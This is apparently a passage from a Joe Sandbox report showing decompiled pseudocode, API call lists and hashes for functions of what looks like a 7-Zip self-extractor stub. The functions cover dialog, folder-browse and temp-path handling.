				E004086A5();
				return _t32;
			}

0x00409278
0x0040928d
0x0040928f
0x004092a2
0x004092a5
0x004092b0
0x004092b5
0x004092ca
0x004092de
0x004092fe
0x0040930e
0x00409327
0x0040932a
0x00409333
0x0040933d

APIs

Part of subcall function 00407A29: GetDlgItem.USER32 ref: 00407A31

Part of subcall function 00407ABB: GetDlgItem.USER32 ref: 00407AC8
Part of subcall function 00407ABB: ShowWindow.USER32(00000000,?), ref: 00407ADF

memset.MSVCRT ref: 004092CA
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004092DE
SHGetFileInfoW.SHELL32(?,00000000,00000000,000002B4,00000103), ref: 004092FE
GetDlgItem.USER32 ref: 00409311
SetWindowLongW.USER32 ref: 0040931F

Part of subcall function 00408F3F: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040932F), ref: 00408F69
Part of subcall function 00408F3F: LoadIconW.USER32(00000000), ref: 00408F6C
Part of subcall function 00408F3F: GetSystemMetrics.USER32 ref: 00408F80
Part of subcall function 00408F3F: GetSystemMetrics.USER32 ref: 00408F85
Part of subcall function 00408F3F: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040932F), ref: 00408F8E
Part of subcall function 00408F3F: LoadImageW.USER32 ref: 00408F91
Part of subcall function 00408F3F: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408FB1
Part of subcall function 00408F3F: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408FBA
Part of subcall function 00408F3F: GetDlgItem.USER32 ref: 00408FD7
Part of subcall function 00408F3F: GetDlgItem.USER32 ref: 00408FE1
Part of subcall function 00408F3F: GetWindowLongW.USER32(?,000000F0), ref: 00408FED
Part of subcall function 00408F3F: SetWindowLongW.USER32 ref: 00408FFC
Part of subcall function 00408F3F: GetDlgItem.USER32 ref: 0040900A
Part of subcall function 00408F3F: GetDlgItem.USER32 ref: 00409018
Part of subcall function 00408F3F: GetWindowLongW.USER32(000000F0,000000F0), ref: 00409024
Part of subcall function 00408F3F: SetWindowLongW.USER32 ref: 00409033
Part of subcall function 00408F3F: GetDlgItem.USER32 ref: 00409040

Part of subcall function 004086A5: GetDlgItem.USER32 ref: 004086BB
Part of subcall function 004086A5: SetFocus.USER32(00000000,?,?,?,?,00408760,?), ref: 004086BE
Part of subcall function 004086A5: GetDlgItem.USER32 ref: 004086CE
Part of subcall function 004086A5: GetDlgItem.USER32 ref: 004086E3
Part of subcall function 004086A5: SendMessageW.USER32(00000000,000000B1,00000029,00000029), ref: 004086ED

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: Item$Window$Long$MessageSendSystem$HandleLoadMetricsModule$DirectoryFileFocusIconImageInfoShowmemset
String ID:
API String ID: 358862773-0
Opcode ID: 1bf49a831eb8ff5c5ec00c495e72c7c0aa245b25d53b34aa7426faeff0649c07
Instruction ID: 03ccca4f95bb87f70630d4e99c8394251a1916bed47e60b30c1cc3b52240f206
Opcode Fuzzy Hash: 1bf49a831eb8ff5c5ec00c495e72c7c0aa245b25d53b34aa7426faeff0649c07
Instruction Fuzzy Hash: 5A1186B1E0031467DB10EBA5DD4DF9E77BCAB44B04F00446EB611F32C1DBB8AA448B69

Uniqueness

Uniqueness Score: -1.00%

Function 004086A5, Relevance: 7.5, APIs: 5, Instructions: 36
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004086A5() {
				int _t8;
				void* _t12;
				void* _t15;

				_t15 = _t12;
				SetFocus(GetDlgItem( *(_t15 + 4), 0x4b6));
				E00407A0F(GetDlgItem( *(_t15 + 4), 0x4b6),  *0x41e89c);
				_t8 =  *0x41e8a0; // 0x29
				_t16 = _t8;
				return SendMessageW(GetDlgItem( *(_t15 + 4), 0x4b6), 0xb1, _t8, _t16);
			}

0x004086b5
0x004086be
0x004086d3
0x004086d8
0x004086e1
0x004086f8

APIs

GetDlgItem.USER32 ref: 004086BB
SetFocus.USER32(00000000,?,?,?,?,00408760,?), ref: 004086BE
GetDlgItem.USER32 ref: 004086CE

Part of subcall function 00407A0F: SetWindowTextW.USER32(00000000,00000000), ref: 00407A17

GetDlgItem.USER32 ref: 004086E3
SendMessageW.USER32(00000000,000000B1,00000029,00000029), ref: 004086ED

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: Item$FocusMessageSendTextWindow
String ID:
API String ID: 3590784419-0
Opcode ID: fad516354ac438f4a26c589cea41e0691f814e4d079acfbf6477a805b15347a8
Instruction ID: e481abceb184fc0549e30438c3999ed73e1b8a385c7d6d0c75719509d1fab071
Opcode Fuzzy Hash: fad516354ac438f4a26c589cea41e0691f814e4d079acfbf6477a805b15347a8
Instruction Fuzzy Hash: 3EF0EC7110120C7FDB103752DC48D6B7F9DEBC53543014439FA0583120CB766C108B74

Uniqueness

Uniqueness Score: -1.00%

Function 00413ABD, Relevance: 7.5, APIs: 5, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00413ABD(intOrPtr* __ecx) {
				void* _t5;

				_push( *((intOrPtr*)(__ecx + 0x34)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x28)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0x18)));
				L004191B0();
				_push( *((intOrPtr*)(__ecx + 0xc)));
				L004191B0();
				_push( *__ecx);
				L004191B0();
				return _t5;
			}

0x00413ac0
0x00413ac3
0x00413ac8
0x00413acb
0x00413ad0
0x00413ad3
0x00413ad8
0x00413adb
0x00413ae0
0x00413ae2
0x00413aeb

APIs

??3@YAXPAX@Z.MSVCRT ref: 00413AC3
??3@YAXPAX@Z.MSVCRT ref: 00413ACB
??3@YAXPAX@Z.MSVCRT ref: 00413AD3
??3@YAXPAX@Z.MSVCRT ref: 00413ADB
??3@YAXPAX@Z.MSVCRT ref: 00413AE2

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 65885e07c200fda2b57cfa2a1cc6178dfe62e603f35ddd0798080fd19599c85f
Instruction ID: 781d56d26fbb2de701dc3dac839f3b2d883cb9d7cd57b29d0df98cb94b4adf54
Opcode Fuzzy Hash: 65885e07c200fda2b57cfa2a1cc6178dfe62e603f35ddd0798080fd19599c85f
Instruction Fuzzy Hash: 29D0C731400511BAEA223B16EC1B9C67AB3AF0031830D056FF8871143BDB567CE1DA4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040884D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040884D(intOrPtr* __ecx, void* __edx, void* __eflags) {
				char _v12;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v36;
				char _v40;
				int _t39;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t56;
				int _t58;
				intOrPtr _t60;
				intOrPtr _t70;
				char* _t74;
				intOrPtr* _t75;

				_t75 = __ecx;
				E00408579(__ecx);
				_t39 = GetSystemMetrics(7);
				_t60 =  *0x41e450; // 0x12c
				if( *((intOrPtr*)(_t75 + 0x14)) < _t60 - _t39) {
					_t58 = GetSystemMetrics(7);
					_t70 =  *0x41e450; // 0x12c
					 *((intOrPtr*)(_t75 + 0x14)) = _t70 - _t58;
				}
				E00411B84( &_v24,  *((intOrPtr*)(_t75 + 0xc)));
				_t74 = L" 100%% ";
				if(( *0x41e44c & 0x00000002) == 0) {
					E00411CA3( &_v24, _t74);
				}
				if(E00407907(_t75, _v24,  &_v12) != 0) {
					_t56 = _v12;
					if(_t56 >  *((intOrPtr*)(_t75 + 0x14))) {
						 *((intOrPtr*)(_t75 + 0x14)) = _t56;
					}
				}
				E00407A29(_t75, 0x4b8,  &_v40);
				 *((intOrPtr*)(_t75 + 0x18)) =  *((intOrPtr*)(_t75 + 0x18)) + _v28 - _v36 + 0xe;
				if(( *0x41e44c & 0x00000004) != 0) {
					_push(0x820);
					_push( *((intOrPtr*)(_t75 + 0x34)));
					_push(_t75 + 0x50);
					_push(_t74);
					if( *((intOrPtr*)( *_t75 + 8))() != 0) {
						 *((intOrPtr*)(_t75 + 0x18)) =  *((intOrPtr*)(_t75 + 0x18)) +  *((intOrPtr*)(_t75 + 0x5c));
					}
					 *((intOrPtr*)(_t75 + 0x18)) =  *((intOrPtr*)(_t75 + 0x18)) + 5;
				}
				 *((intOrPtr*)(_t75 + 0x18)) =  *((intOrPtr*)(_t75 + 0x18)) + 0xffffffee;
				_t48 =  *((intOrPtr*)(_t75 + 0x18));
				if( *0x41e770 != 1) {
					_t49 = _t48 + 0xa;
					 *((intOrPtr*)(_t75 + 0x18)) = _t49;
				} else {
					E00407A29(_t75, 0x4b4,  &_v40);
					_t49 = _v36 - _v28;
					 *((intOrPtr*)(_t75 + 0x18)) =  *((intOrPtr*)(_t75 + 0x18)) + _t49;
				}
				_push(_v24);
				L004191B0();
				return _t49;
			}

0x00408855
0x00408857
0x00408864
0x00408866
0x00408871
0x00408875
0x00408877
0x0040887f
0x0040887f
0x00408888
0x00408894
0x00408899
0x0040889f
0x0040889f
0x004088b4
0x004088b6
0x004088bc
0x004088be
0x004088be
0x004088bc
0x004088cc
0x004088da
0x004088e4
0x004088e8
0x004088ed
0x004088f3
0x004088f4
0x004088fc
0x00408901
0x00408901
0x00408904
0x00408904
0x00408908
0x00408913
0x00408916
0x00408933
0x00408936
0x00408918
0x00408923
0x0040892b
0x0040892e
0x0040892e
0x00408939
0x0040893c
0x00408945

APIs

Part of subcall function 00408579: GetSystemMetrics.USER32 ref: 004085A1
Part of subcall function 00408579: GetSystemMetrics.USER32 ref: 004085A8

GetSystemMetrics.USER32 ref: 00408864
GetSystemMetrics.USER32 ref: 00408875
??3@YAXPAX@Z.MSVCRT ref: 0040893C

Strings

100%% , xrefs: 00408894, 0040889B, 004088F4

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: MetricsSystem$??3@
String ID: 100%%
API String ID: 2562992111-568723177
Opcode ID: 12f67b010b6c6ce84eccff202d1a0e8d3bcac39d66bf8899ef5ab7ef9dd2aa27
Instruction ID: 3e0dd225468330a220e365205065e92fc94ece49804654ab909baed5dde81f9a
Opcode Fuzzy Hash: 12f67b010b6c6ce84eccff202d1a0e8d3bcac39d66bf8899ef5ab7ef9dd2aa27
Instruction Fuzzy Hash: 8C31B471A007059FDB24EFAAD9459AEB7F4EF10708B00452ED582A22E1DB78FD44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00405DA5, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00405DA5(void* __edx, void* __edi, void* __eflags) {
				char _v16;
				char _v100;
				short _v356;
				void* _t28;
				WCHAR* _t49;
				signed int _t51;
				void* _t55;
				void* _t57;

				 *0x41e44c = 8;
				E004076D3( &_v100, __edx, __eflags);
				_v100 = "G]@";
				E00411B84( &_v16, E00403DC8(1));
				_t51 = 0;
				_t55 =  *0x420b58 - _t51; // 0x7
				if(_t55 > 0) {
					_t49 = L", ";
					do {
						if(_t51 != 0) {
							E00411CA3( &_v16, _t49);
						}
						E00411D89( &_v16,  *((intOrPtr*)( *((intOrPtr*)(0x420a18 + _t51 * 4)) + 0x10)));
						_t51 = _t51 + 1;
						_t57 = _t51 -  *0x420b58; // 0x7
					} while (_t57 < 0);
					if(_t51 != 0) {
						E00411CA3( &_v16, _t49);
					}
				}
				E00411CA3( &_v16, L"Volumes");
				wsprintfW( &_v356, L" \n\t%X - %03X - %03X - %03X - %03X", 1, 0x5b7, 0x1f, 0x3fff, 7);
				E00411CA3( &_v16,  &_v356);
				E00411CA3( &_v16, 0x41bbe4);
				_t28 = E00407A45( &_v100, 0x11,  *0x41e738, _v16, 0);
				_push(_v16);
				L004191B0();
				return E00407734(_t28,  &_v100);
			}

0x00405db2
0x00405dbc
0x00405dc4
0x00405dd4
0x00405dd9
0x00405ddb
0x00405de1
0x00405de4
0x00405de9
0x00405deb
0x00405df1
0x00405df1
0x00405e03
0x00405e08
0x00405e09
0x00405e09
0x00405e13
0x00405e19
0x00405e19
0x00405e1e
0x00405e27
0x00405e48
0x00405e5b
0x00405e68
0x00405e7d
0x00405e82
0x00405e85
0x00405e95

APIs

Part of subcall function 004076D3: KiUserCallbackDispatcher.NTDLL ref: 00407715
Part of subcall function 004076D3: GetSystemMetrics.USER32 ref: 00407723

Part of subcall function 00411B84: memcpy.MSVCRT ref: 00411BAA

wsprintfW.USER32 ref: 00405E48
??3@YAXPAX@Z.MSVCRT ref: 00405E85

Part of subcall function 00411CA3: memcpy.MSVCRT ref: 00411CD0

Strings

Volumes, xrefs: 00405E1F
%X - %03X - %03X - %03X - %03X, xrefs: 00405E42

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: memcpy$??3@CallbackDispatcherMetricsSystemUserwsprintf
String ID: %X - %03X - %03X - %03X - %03X$Volumes
API String ID: 2991351368-1890733987
Opcode ID: fe1d066e480cc0a8df7484f04aff36523d42970a70a16410e725cc97b66a1737
Instruction ID: ab41b2b7a044f4dbafe54773f7122e0ca5258214a4a67c8b0ba5fddcbcc6d2b4
Opcode Fuzzy Hash: fe1d066e480cc0a8df7484f04aff36523d42970a70a16410e725cc97b66a1737
Instruction Fuzzy Hash: 5821A131D44618AACB15AB91EC16EEEB774EF40704F00417FB516361E6EBB86A84CBC8

Uniqueness

Uniqueness Score: -1.00%

Function 004086F9, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E004086F9(void* __ecx) {
				signed int _v8;
				intOrPtr _v24;
				void _v40;
				char _v564;
				intOrPtr* _t20;
				char* _t22;
				signed int _t24;
				signed int _t30;
				intOrPtr* _t38;
				void* _t39;

				_t39 = __ecx;
				_t30 = 8;
				memset( &_v40, 0, _t30 << 2);
				_v40 =  *((intOrPtr*)(_t39 + 4));
				_t20 =  &_v40;
				_v24 = 0x41;
				__imp__SHBrowseForFolderW(_t20);
				_t38 = _t20;
				if(_t38 != 0) {
					_v564 = 0;
					_t22 =  &_v564;
					__imp__SHGetPathFromIDListW(_t38, _t22);
					if(_t22 != 0) {
						E00411BE5(0x41e89c,  &_v564);
						E004086A5();
					}
					_v8 = _v8 & 0x00000000;
					_t20 =  &_v8;
					__imp__SHGetMalloc(_t20);
					if(_t20 == 0) {
						_t20 = _v8;
						if(_t20 != 0) {
							 *((intOrPtr*)( *_t20 + 0x14))(_t20, _t38);
							_t24 = _v8;
							return  *((intOrPtr*)( *_t24 + 8))(_t24);
						}
					}
				}
				return _t20;
			}

0x00408704
0x0040870a
0x0040870e
0x00408713
0x00408716
0x0040871a
0x00408721
0x00408727
0x0040872b
0x0040872f
0x00408736
0x0040873e
0x00408746
0x00408754
0x0040875b
0x0040875b
0x00408760
0x00408764
0x00408768
0x00408770
0x00408772
0x00408777
0x0040877d
0x00408780
0x00000000
0x00408786
0x00408777
0x00408770
0x0040878c

APIs

SHBrowseForFolderW.SHELL32(?), ref: 00408721
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040873E
SHGetMalloc.SHELL32(00000000), ref: 00408768

Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT ref: 00411C17
Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT ref: 00411C20
Part of subcall function 00411BE5: memcpy.MSVCRT ref: 00411C38

Part of subcall function 004086A5: GetDlgItem.USER32 ref: 004086BB
Part of subcall function 004086A5: SetFocus.USER32(00000000,?,?,?,?,00408760,?), ref: 004086BE
Part of subcall function 004086A5: GetDlgItem.USER32 ref: 004086CE
Part of subcall function 004086A5: GetDlgItem.USER32 ref: 004086E3
Part of subcall function 004086A5: SendMessageW.USER32(00000000,000000B1,00000029,00000029), ref: 004086ED

Strings

A, xrefs: 0040871A

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: Item$??2@??3@BrowseFocusFolderFromListMallocMessagePathSendmemcpy
String ID: A
API String ID: 593732027-3554254475
Opcode ID: 3aef01d46d1d784e5e29d610c3657d02adb904ff4126155760b37b46b3dd5f1b
Instruction ID: f71166d28af5d16d10e8ce64d0ac3497a8bafdc94a68efcedc6b2873967d7f2a
Opcode Fuzzy Hash: 3aef01d46d1d784e5e29d610c3657d02adb904ff4126155760b37b46b3dd5f1b
Instruction Fuzzy Hash: 1E1124756101089BDB10DBA5D958BEE77FCAF44700F1440AEE505E7240EF79DE04CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00407474, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00407474(void* __ecx, void* __edx) {
				intOrPtr _v16;
				void* _t10;
				signed int _t12;
				void* _t15;
				void* _t30;

				_t30 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					__eflags =  *0x41e774 & 0x00000080;
					if(__eflags == 0) {
						_t28 = L"7ZipSfx.%03x";
						_t10 = E0040439D(L"7ZipSfx.%03x", __eflags);
						_t6 = _t30 + 4; // 0x41e86c
						E00411C48(_t6, _t10);
						_push(_v16);
						L004191B0();
						_t8 = _t30 + 4; // 0xbc24f0
						_t12 = E00404772( *_t8, L"7ZipSfx.%03x");
						__eflags = _t12;
						if(_t12 != 0) {
							E00407474(_t30, _t28);
							_t9 = _t30 + 4; // 0xbc24f0
							E00405051(L"SfxVarApiPath",  *_t9, __eflags, 0);
							_t15 = E0040758D();
						} else {
							_t15 = 0;
						}
						return _t15;
					}
					_t4 = _t30 + 4; // 0x41e86c
					E00411C48(_t4, 0x41e794);
				}
				return 1;
			}

0x0040747b
0x00407481
0x00407487
0x0040748e
0x004074a0
0x004074a8
0x004074ae
0x004074b1
0x004074b6
0x004074b9
0x004074bf
0x004074c2
0x004074c7
0x004074c9
0x004074d1
0x004074d6
0x004074e0
0x004074e7
0x004074cb
0x004074cb
0x004074cb
0x00000000
0x004074ec
0x00407495
0x00407498
0x00407498
0x00000000

APIs

Part of subcall function 0040439D: GetTempPathW.KERNEL32(00000001,00000000,00000002,PreExtract,0041AA3C,?,00000000,?,00405BF5), ref: 004043BF
Part of subcall function 0040439D: GetTempPathW.KERNEL32(00000001,00000000,00000001,?,00000000,?,00405BF5), ref: 004043DE
Part of subcall function 0040439D: wsprintfW.USER32 ref: 00404400
Part of subcall function 0040439D: GetFileAttributesW.KERNEL32(?,?,?,00405BF5,?,?,?,?,?,?,?,?,?,?,004070C0,0041E844), ref: 00404412

Part of subcall function 00411C48: ??2@YAPAXI@Z.MSVCRT ref: 00411C70
Part of subcall function 00411C48: ??3@YAXPAX@Z.MSVCRT ref: 00411C79
Part of subcall function 00411C48: memcpy.MSVCRT ref: 00411C93

??3@YAXPAX@Z.MSVCRT ref: 004074B9

Part of subcall function 00404772: lstrlenW.KERNEL32(?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 00404781
Part of subcall function 00404772: GetSystemTimeAsFileTime.KERNEL32(00402DFC,00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 004047ED
Part of subcall function 00404772: GetFileAttributesW.KERNELBASE(00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 004047F4
Part of subcall function 00404772: ??3@YAXPAX@Z.MSVCRT ref: 004048A6

Strings

7ZipSfx.%03x, xrefs: 004074A0
SfxVarApiPath, xrefs: 004074DB
PreExtract, xrefs: 0040747A

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@File$AttributesPathTempTime$??2@Systemlstrlenmemcpywsprintf
String ID: 7ZipSfx.%03x$PreExtract$SfxVarApiPath
API String ID: 1986220984-914423340
Opcode ID: c9a559955efd5dd63b25dec278178827c5d2335382405911b47e1956e76061a7
Instruction ID: 2ce7c900065db82cd6f53f7d938477cc4679eae404a7dae147fc4add6962fe21
Opcode Fuzzy Hash: c9a559955efd5dd63b25dec278178827c5d2335382405911b47e1956e76061a7
Instruction Fuzzy Hash: 65F0D670A0810063C704B765D952AEEB7555F81308B10823FE926325E2EF3CA985C6CF

Uniqueness

Uniqueness Score: -1.00%

Function 0040842D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040842D(void* __ecx) {
				char _v16;
				short _v528;
				void* _t16;
				WCHAR* _t26;
				void* _t28;

				_t28 = __ecx;
				E00411BBA( &_v16, __ecx + 0x3c);
				if( *((intOrPtr*)(__ecx + 0x48)) > 0) {
					_t26 = 0x1d;
					wsprintfW( &_v528, L" (%d%s)",  *((intOrPtr*)(__ecx + 0x48)), E00403DC8(_t26));
					E00411CA3( &_v16,  &_v528);
				}
				_t16 = E00407A0F(GetDlgItem( *(_t28 + 4),  *(_t28 + 0x4c)), _v16);
				_push(_v16);
				L004191B0();
				return _t16;
			}

0x00408437
0x00408440
0x00408449
0x0040844d
0x00408463
0x00408476
0x00408476
0x0040848e
0x00408493
0x00408496
0x0040849e

APIs

Part of subcall function 00411BBA: memcpy.MSVCRT ref: 00411BD6

wsprintfW.USER32 ref: 00408463

Part of subcall function 00411CA3: memcpy.MSVCRT ref: 00411CD0

GetDlgItem.USER32 ref: 00408485
??3@YAXPAX@Z.MSVCRT ref: 00408496

Strings

(%d%s), xrefs: 0040845D

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: memcpy$??3@Itemwsprintf
String ID: (%d%s)
API String ID: 1424909225-2087557067
Opcode ID: 50f8f7e77dcdce2d2851faa96b4847d1a382eb25ef94aa29150f29fce31bd72e
Instruction ID: 9e5063b97f59bed1c8fd24a2ad4692a97a2054891322a5ccd9956e41115b1732
Opcode Fuzzy Hash: 50f8f7e77dcdce2d2851faa96b4847d1a382eb25ef94aa29150f29fce31bd72e
Instruction Fuzzy Hash: 61F0CD71800218BFCB21B755DC05EDE77BCDF04304F10856BF512A11A1DB75AA548F98

Uniqueness

Uniqueness Score: -1.00%

Function 00404666, Relevance: 6.1, APIs: 4, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00404666(signed short** __ecx, void* __edi, void* __eflags) {
				signed short* _v8;
				signed short** _v12;
				char _v24;
				char _v36;
				char _v48;
				char _v60;
				void* _t30;
				void* _t33;
				signed int _t37;
				void* _t39;
				signed int _t46;
				signed int _t66;
				signed short* _t72;

				_v12 = __ecx;
				E00411B60(_t30,  &_v24);
				_t72 =  *__ecx;
				_t46 =  *_t72 & 0x0000ffff;
				if(_t46 != 0) {
					_v8 =  &(_t72[2]);
					do {
						if(_t46 != 0x7e) {
							L10:
							E004015EC( &_v24, _t46);
							_t72 =  &(_t72[1]);
							_t25 =  &_v8;
							 *_t25 =  &(_v8[1]);
							__eflags =  *_t25;
						} else {
							_t66 = _t72[1] & 0x0000ffff;
							_t76 = _t66 - 0x78;
							if(_t66 != 0x78) {
								L6:
								__eflags = _t66 - 0x58;
								if(__eflags != 0) {
									goto L10;
								} else {
									_t68 = E004033E5(_v8, __eflags);
									__eflags = _t36;
									if(__eflags < 0) {
										goto L10;
									} else {
										_t37 = E004033E5( &(_t72[4]), __eflags);
										__eflags = _t37;
										if(_t37 < 0) {
											goto L10;
										} else {
											E004015EC( &_v24, _t68 << 0x00000008 | _t37);
											_t72 =  &(_t72[6]);
											_v8 =  &(_v8[6]);
										}
									}
								}
							} else {
								_t39 = E004033E5(_v8, _t76);
								_t77 = _t39;
								if(_t39 < 0) {
									goto L6;
								} else {
									E00411B60(E00411765( &_v48, _t39),  &_v36);
									E00411C48( &_v36, E0040442E( &_v60,  &_v48, _t77, 0));
									_push(_v60);
									L004191B0();
									E00411CE3( &_v24, _t77,  &_v36);
									_push(_v36);
									_v8 =  &(_v8[4]);
									_t72 =  &(_t72[4]);
									L004191B0();
									_push(_v48);
									L004191B0();
								}
							}
						}
						_t46 =  *_t72 & 0x0000ffff;
					} while (_t46 != 0);
				}
				_t33 = E00411C48(_v12,  &_v24);
				_push(_v24);
				L004191B0();
				return _t33;
			}

0x00404673
0x00404676
0x0040467b
0x0040467d
0x00404683
0x0040468c
0x00404690
0x00404694
0x0040473c
0x00404740
0x00404745
0x00404748
0x00404748
0x00404748
0x0040469a
0x0040469a
0x0040469e
0x004046a1
0x00404706
0x00404706
0x00404709
0x00000000
0x0040470b
0x00404713
0x00404715
0x00404717
0x00000000
0x00404719
0x0040471c
0x00404721
0x00404723
0x00000000
0x00404725
0x0040472e
0x00404733
0x00404736
0x00404736
0x00404723
0x00404717
0x004046a3
0x004046a6
0x004046ab
0x004046ad
0x00000000
0x004046af
0x004046bb
0x004046d1
0x004046d6
0x004046d9
0x004046e6
0x004046eb
0x004046ee
0x004046f2
0x004046f5
0x004046fa
0x004046fd
0x00404703
0x004046ad
0x004046a1
0x0040474c
0x0040474f
0x00404758
0x00404760
0x00404765
0x00404768
0x00404771

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT ref: 00411B68

??3@YAXPAX@Z.MSVCRT ref: 00404768

Part of subcall function 0040442E: MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00000000,004046CD,00000000,00000000,?,74B049F0,00000000), ref: 0040445A

Part of subcall function 00411C48: ??2@YAPAXI@Z.MSVCRT ref: 00411C70
Part of subcall function 00411C48: ??3@YAXPAX@Z.MSVCRT ref: 00411C79
Part of subcall function 00411C48: memcpy.MSVCRT ref: 00411C93

??3@YAXPAX@Z.MSVCRT ref: 004046D9

Part of subcall function 00411CE3: memcpy.MSVCRT ref: 00411D06

??3@YAXPAX@Z.MSVCRT ref: 004046F5
??3@YAXPAX@Z.MSVCRT ref: 004046FD

Memory Dump Source

